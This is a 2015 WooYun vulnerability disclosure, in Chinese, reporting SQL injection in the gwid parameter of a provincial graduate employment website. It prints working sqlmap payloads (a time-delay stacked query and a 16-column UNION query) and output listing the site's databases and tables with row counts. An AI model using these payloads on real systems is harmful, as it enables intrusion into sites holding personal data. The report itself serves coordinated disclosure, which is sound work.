某省毕业生就业网存在SQL注入可union | wooyun-2015-0144532| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144532

漏洞标题：某省毕业生就业网存在SQL注入可union

漏洞作者：路人甲

提交时间：2015-10-05 20:02

修复时间：2015-11-26 09:52

公开时间：2015-11-26 09:52

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-05：细节已通知厂商并且等待厂商处理中
2015-10-12：厂商已经确认，细节仅向厂商公开
2015-10-22：细节向核心白帽子及相关领域专家公开
2015-11-01：细节向普通白帽子公开
2015-11-11：细节向实习白帽子公开
2015-11-26：细节向公众公开

简要描述：

某省毕业生就业网存在SQL注入

详细说明：

http://**.**.**.**/reg.aspx?gwid=

参数gwid

Parameter: gwid (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: gwid=';WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: gwid=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHA
R(120)+CHAR(107)+CHAR(113)+CHAR(90)+CHAR(80)+CHAR(101)+CHAR(84)+CHAR(112)+CHAR(88)+CHAR(109)+CHAR(85
)+CHAR(105)+CHAR(80)+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,
NULL--
---
[15:11:36] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2012
[15:11:36] [INFO] fetching database names
[15:11:36] [INFO] the SQL query used returns 8 entries
[15:11:36] [INFO] resumed: "distribution"
[15:11:36] [INFO] resumed: "edu_jsgl"
[15:11:36] [INFO] resumed: "master"
[15:11:36] [INFO] resumed: "model"
[15:11:36] [INFO] resumed: "msdb"
[15:11:36] [INFO] resumed: "ReportServer"
[15:11:36] [INFO] resumed: "ReportServerTempDB"
[15:11:36] [INFO] resumed: "tempdb"
available databases [8]:
[*] distribution
[*] edu_jsgl
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

漏洞证明：

Database: edu_jsgl
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| dbo.Table_Users_DLJL      | 821521  |
| dbo.Table_Users_Attach    | 91161   |
| dbo.Table_Users_Attach    | 91161   |
| dbo.XTWH_GZKZ_CZJL        | 85409   |
| dbo.V_XTWH_GZKZ_SHJL      | 59435   |
| dbo.XTWH_GZKZ_SHJL        | 59435   |
| dbo.V_table_users_message | 43154   |
| dbo.table_confirm         | 38336   |
| dbo.V_Table_Enroll2       | 38316   |
| dbo.V_Table_Enroll2       | 38316   |
| dbo.V_wsbmgl              | 38316   |
| dbo.View_1                | 38316   |
| dbo.table_examinfo        | 27257   |
| dbo.table_scores          | 27257   |
| dbo.V_Table_Scores        | 27257   |
| dbo.bmbh_2014             | 21477   |
| dbo.a1                    | 20243   |
| dbo.bmbh_2015             | 18073   |
| dbo.table_interview       | 18053   |
| dbo.V_StaticAll           | 15725   |
| dbo.Table_Users_CZJL      | 13552   |
| dbo.table_recruit         | 13120   |
| dbo.V_Table_recruit       | 13120   |
| dbo.Table_Users_Limit     | 11975   |
| dbo.Table_Zsrecruit       | 11236   |
| dbo.V_Table_Zsrecruit     | 11236   |
| dbo.Table_Users_Message   | 9974    |
| dbo.Table_Enroll_DABH_XS  | 7067    |
| dbo.table_health          | 6444    |
| dbo.Table_Enroll_DABH_GX  | 5496    |
| dbo.V_BmStatic            | 5189    |
| dbo.V_BmStaticQrtj        | 5189    |
| dbo.BM_SY                 | 4885    |
| dbo.Table_Normal          | 4885    |
| dbo.Table_School          | 4026    |
| dbo.Table_XZDM            | 3678    |
| dbo.Sheet1$               | 3649    |
| dbo.Table_Major           | 3450    |
| dbo.XTWH_GZKZ_DLJL        | 3347    |
| dbo.V_Table_Position_XX   | 2370    |
| dbo.V_Table_Position_CZ   | 1041    |
| dbo.Table_Enroll_DABH_BTG | 722     |
| dbo.Table_Enroll_DABH_BTG | 722     |
| dbo.XTWH_QXWH_YHQX        | 188     |
| dbo.V_yhqx                | 187     |
| dbo.Table_Region          | 146     |
| dbo.V_XTWH_QXWH_FZYH      | 123     |
| dbo.XTWH_QXWH_FZYH        | 123     |
| dbo.NewsData              | 115     |
| dbo.V_NewsDataWithPath    | 115     |
| dbo.sqlmapoutput          | 114     |
| dbo.V_XTWH_QXWH_YHQX      | 94      |
| dbo.V_NewsData_SH         | 66      |
| dbo.V_XTWH_JCSJ_CSMC      | 62      |
| dbo.XTWH_JCSJ_CSMC        | 62      |
| dbo.XTWH_QXWH_FZQX        | 54      |
| dbo.V_NewsData_BC         | 49      |
| dbo.XTWH_QXWH_QXGL        | 43      |
| dbo.V_XTWH_QXWH_BMGL      | 28      |
| dbo.XTWH_QXWH_BMGL        | 28      |
| dbo.Table_Enroll_Xk       | 20      |
| dbo.NewsClass             | 7       |
| dbo.V_NewsClass           | 7       |
| dbo.Table_Advantage       | 6       |
| dbo.XTWH_QXWH_FZGL        | 6       |
| dbo.XTWH_JCSJ_CSLB        | 5       |
| dbo.V_XTWH_QXWH_YHGL      | 3       |
| dbo.V_XTWH_SJZD_BMSZ      | 3       |
| dbo.V_yhgl                | 3       |
| dbo.XTWH_QXWH_YHGL        | 3       |
| dbo.table_alter           | 2       |
| dbo.XTWH_SJZD_BMSZ        | 2       |
| dbo.XTWH_SJZD_LBSZ        | 2       |
| dbo.Announce              | 1       |
+---------------------------+---------+

Database: master
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| sys.messages                                     | 231924  |
| sys.sysmessages                                  | 231924  |
| sys.dm_os_memory_objects                         | 169792  |
| sys.dm_os_memory_cache_entries                   | 143367  |
| sys.syscacheobjects                              | 139705  |
| sys.dm_exec_cached_plans                         | 139348  |
| sys.dm_os_buffer_descriptors                     | 49833   |
| sys.fulltext_system_stopwords                    | 15829   |
| sys.syscolumns                                   | 13597   |
| sys.dm_os_ring_buffers                           | 11680   |
| sys.dm_os_virtual_address_dump                   | 11628   |
| sys.dm_exec_query_stats                          | 10949   |
| sys.all_columns                                  | 7364    |
| sys.all_parameters                               | 7202    |
| sys.system_parameters                            | 7202    |
| sys.system_columns                               | 6582    |
| sys.dm_xe_object_columns                         | 6091    |
| sys.trace_subclass_values                        | 5444    |
| sys.trace_event_bindings                         | 4315    |
| sys.dm_xe_map_values                             | 3617    |
| sys.syscomments                                  | 3091    |
| dbo.spt_values                                   | 2515    |
| sys.all_objects                                  | 2102    |
| sys.sysobjects                                   | 2102    |
| sys.database_permissions                         | 2046    |
| sys.syspermissions                               | 2045    |
| sys.sysprotects                                  | 2041    |
| sys.system_objects                               | 2013    |
| sys.all_sql_modules                              | 1866    |
| sys.system_sql_modules                           | 1863    |
| sys.dm_os_performance_counters                   | 1300    |
| sys.sysperfinfo                                  | 1300    |
| sys.dm_xe_objects                                | 1143    |
| sys.system_internals_partition_columns           | 946     |
| sys.columns                                      | 782     |
| sys.dm_os_wait_stats                             | 649     |
| sys.dm_os_tasks                                  | 588     |
| sys.dm_audit_actions                             | 507     |
| sys.stats_columns                                | 406     |
| sys.stats_columns                                | 406     |
| sys.all_views                                    | 403     |
| sys.system_views                                 | 402     |
| sys.dm_exec_query_transformation_stats           | 397     |
| sys.spatial_reference_systems                    | 391     |
| sys.event_notification_event_types               | 380     |
| sys.dm_os_memory_cache_clock_hands               | 374     |
| sys.dm_os_memory_clerks                          | 325     |
| sys.index_columns                                | 310     |
| sys.sysindexkeys                                 | 310     |
| sys.trigger_event_types                          | 260     |
| sys.dm_db_missing_index_details                  | 239     |
| sys.dm_db_missing_index_group_stats              | 239     |
| sys.dm_db_missing_index_groups                   | 239     |
| sys.sysindexes                                   | 231     |
| sys.dm_db_index_usage_stats                      | 227     |
| sys.dm_os_spinlock_stats                         | 212     |
| sys.dm_os_threads                                | 188     |
| sys.trace_events                                 | 180     |
| sys.dm_os_latch_stats                            | 157     |
| sys.dm_os_worker_local_storage                   | 157     |
| sys.dm_os_workers                                | 157     |
| sys.allocation_units                             | 147     |
| sys.dm_os_memory_cache_counters                  | 147     |
| sys.system_internals_allocation_units            | 147     |
| sys.trace_xe_event_map                           | 138     |
| sys.dm_db_partition_stats                        | 133     |
| sys.indexes                                      | 133     |
| sys.partitions                                   | 133     |
| sys.system_internals_partitions                  | 133     |
| sys.syscharsets                                  | 115     |
| sys.xml_schema_facets                            | 112     |
| sys.dm_server_registry                           | 111     |
| sys.dm_os_loaded_modules                         | 106     |
| sys.xml_schema_components                        | 100     |
| sys.objects                                      | 89      |
| sys.dm_audit_class_type_map                      | 86      |
| sys.dm_os_memory_pools                           | 86      |
| sys.system_components_surface_area_configuration | 85      |
| sys.xml_schema_types                             | 82      |
| sys.configurations                               | 69      |
| sys.sysconfigures                                | 69      |
| sys.syscurconfigs                                | 69      |
| sys.trace_columns                                | 66      |
| sys.dm_os_memory_cache_hash_tables               | 60      |
| sys.dm_exec_procedure_stats                      | 54      |
| sys.fulltext_languages                           | 53      |
| INFORMATION_SCHEMA.COLUMNS                       | 50      |
| sys.fulltext_document_types                      | 50      |
| sys.dm_exec_query_optimizer_info                 | 39      |
| sys.dm_db_session_space_usage                    | 38      |
| sys.dm_db_task_space_usage                       | 38      |
| sys.dm_exec_sessions                             | 38      |
| sys.sysprocesses                                 | 38      |
| sys.dm_exec_requests                             | 35      |
| sys.syslanguages                                 | 34      |
| sys.systypes                                     | 34      |
| sys.types                                        | 34      |
| sys.dm_os_schedulers                             | 33      |
| sys.server_permissions                           | 29      |
| sys.server_principals                            | 26      |
| sys.securable_classes                            | 25      |
| sys.dm_os_memory_node_access_stats               | 24      |
| sys.server_event_session_events                  | 24      |
| sys.dm_xe_session_events                         | 23      |
| sys.dm_xe_session_object_columns                 | 22      |
| sys.trace_xe_action_map                          | 22      |
| sys.dm_os_waiting_tasks                          | 21      |
| sys.trace_categories                             | 21      |
| sys.dm_db_script_level                           | 19      |
| sys.dm_xe_session_event_actions                  | 19      |
| sys.server_event_session_actions                 | 19      |
| sys.xml_schema_component_placements              | 19      |
| sys.database_principals                          | 18      |
| sys.sysaltfiles                                  | 18      |
| sys.sysusers                                     | 18      |
| sys.syslogins                                    | 17      |
| sys.master_files                                 | 16      |
| sys.xml_schema_attributes                        | 16      |
| INFORMATION_SCHEMA.SCHEMATA                      | 15      |
| sys.dm_logpool_hashentries                       | 15      |
| sys.schemas                                      | 15      |
| sys.service_message_types                        | 14      |
| sys.dm_os_stacks                                 | 13      |
| sys.server_event_session_fields                  | 11      |
| sys.service_contract_message_usages              | 11      |
| sys.database_filestream_options                  | 9       |
| sys.dm_os_memory_brokers                         | 9       |
| sys.dm_xe_packages                               | 9       |
| sys.database_recovery_status                     | 8       |
| sys.databases                                    | 8       |
| sys.sysdatabases                                 | 8       |
| sys.certificates                                 | 7       |
| sys.dm_tran_active_transactions                  | 7       |
| sys.dm_tran_database_transactions                | 7       |
| sys.server_role_members                          | 7       |
| INFORMATION_SCHEMA.TABLES                        | 6       |
| sys.crypt_properties                             | 6       |
| sys.service_contracts                            | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES              | 5       |
| sys.dm_os_hosts                                  | 5       |
| sys.endpoints                                    | 5       |
| sys.tables                                       | 5       |
| sys.dm_exec_connections                          | 4       |
| sys.dm_exec_query_resource_semaphores            | 4       |
| sys.dm_tcp_listener_states                       | 4       |
| sys.dm_tran_locks                                | 4       |
| sys.internal_tables                              | 4       |
| sys.sql_logins                                   | 4       |
| sys.syslockinfo                                  | 4       |
| dbo.MSreplication_options                        | 3       |
| sys.assembly_types                               | 3       |
| sys.dm_broker_queue_monitors                     | 3       |
| sys.dm_clr_properties                            | 3       |
| sys.dm_os_memory_nodes                           | 3       |
| sys.dm_os_nodes                                  | 3       |
| sys.dm_server_services                           | 3       |
| sys.dm_xe_session_targets                        | 3       |
| sys.identity_columns                             | 3       |
| sys.linked_logins                                | 3       |
| sys.login_token                                  | 3       |
| sys.server_event_session_targets                 | 3       |
| sys.servers                                      | 3       |
| sys.service_queue_usages                         | 3       |
| sys.service_queues                               | 3       |
| sys.services                                     | 3       |
| sys.sql_modules                                  | 3       |
| sys.sysoledbusers                                | 3       |
| sys.sysservers                                   | 3       |
| sys.type_assembly_usages                         | 3       |
| sys.xml_schema_namespaces                        | 3       |
| INFORMATION_SCHEMA.ROUTINES                      | 2       |
| sys.database_files                               | 2       |
| sys.database_role_members                        | 2       |
| sys.dm_clr_tasks                                 | 2       |
| sys.dm_fts_memory_pools                          | 2       |
| sys.dm_resource_governor_resource_pools          | 2       |
| sys.dm_resource_governor_workload_groups         | 2       |
| sys.dm_xe_sessions                               | 2       |
| sys.key_encryptions                              | 2       |
| sys.procedures                                   | 2       |
| sys.resource_governor_resource_pools             | 2       |
| sys.resource_governor_workload_groups            | 2       |
| sys.server_event_sessions                        | 2       |
| sys.service_contract_usages                      | 2       |
| sys.sysfiles                                     | 2       |
| sys.sysmembers                                   | 2       |
| sys.tcp_endpoints                                | 2       |
| dbo.spt_monitor                                  | 1       |
| INFORMATION_SCHEMA.VIEWS                         | 1       |
| sys.assemblies                                   | 1       |
| sys.assembly_files                               | 1       |
| sys.asymmetric_keys                              | 1       |
| sys.data_spaces                                  | 1       |
| sys.dm_db_file_space_usage                       | 1       |
| sys.dm_db_log_space_usage                        | 1       |
| sys.dm_exec_background_job_queue_stats           | 1       |
| sys.dm_exec_background_job_queue_stats           | 1       |
| sys.dm_fts_fdhosts                               | 1       |
| sys.dm_io_pending_io_requests                    | 1       |
| sys.dm_logpool_stats                             | 1       |
| sys.dm_os_dispatcher_pools                       | 1       |
| sys.dm_os_dispatchers                            | 1       |
| sys.dm_os_memory_broker_clerks                   | 1       |
| sys.dm_os_process_memory                         | 1       |
| sys.dm_os_server_diagnostics_log_configurations  | 1       |
| sys.dm_os_sys_info                               | 1       |
| sys.dm_os_sys_memory                             | 1       |
| sys.dm_os_windows_info                           | 1       |
| sys.dm_resource_governor_configuration           | 1       |
| sys.dm_tran_current_transaction                  | 1       |
| sys.filegroups                                   | 1       |
| sys.remote_logins                                | 1       |
| sys.resource_governor_configuration              | 1       |
| sys.routes                                       | 1       |
| sys.symmetric_keys                               | 1       |
| sys.sysfilegroups                                | 1       |
| sys.sysremotelogins                              | 1       |
| sys.traces                                       | 1       |
| sys.user_token                                   | 1       |
| sys.via_endpoints                                | 1       |
| sys.views                                        | 1       |
| sys.xml_schema_collections                       | 1       |
| sys.xml_schema_model_groups                      | 1       |
| sys.xml_schema_wildcards                         | 1       |
+--------------------------------------------------+---------+

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2015-10-12 09:51

厂商回复：

CNVD确认所述情况,已经转由CNCERT下发给湖南分中心,由其后续协调网站管理单位处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144532

漏洞标题：某省毕业生就业网存在SQL注入可union

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2015-10-05 20:02

修复时间：2015-11-26 09:52

公开时间：2015-11-26 09:52

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144532

漏洞标题：某省毕业生就业网存在SQL注入可union

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2015-10-05 20:02

修复时间：2015-11-26 09:52

公开时间：2015-11-26 09:52

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0144532"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云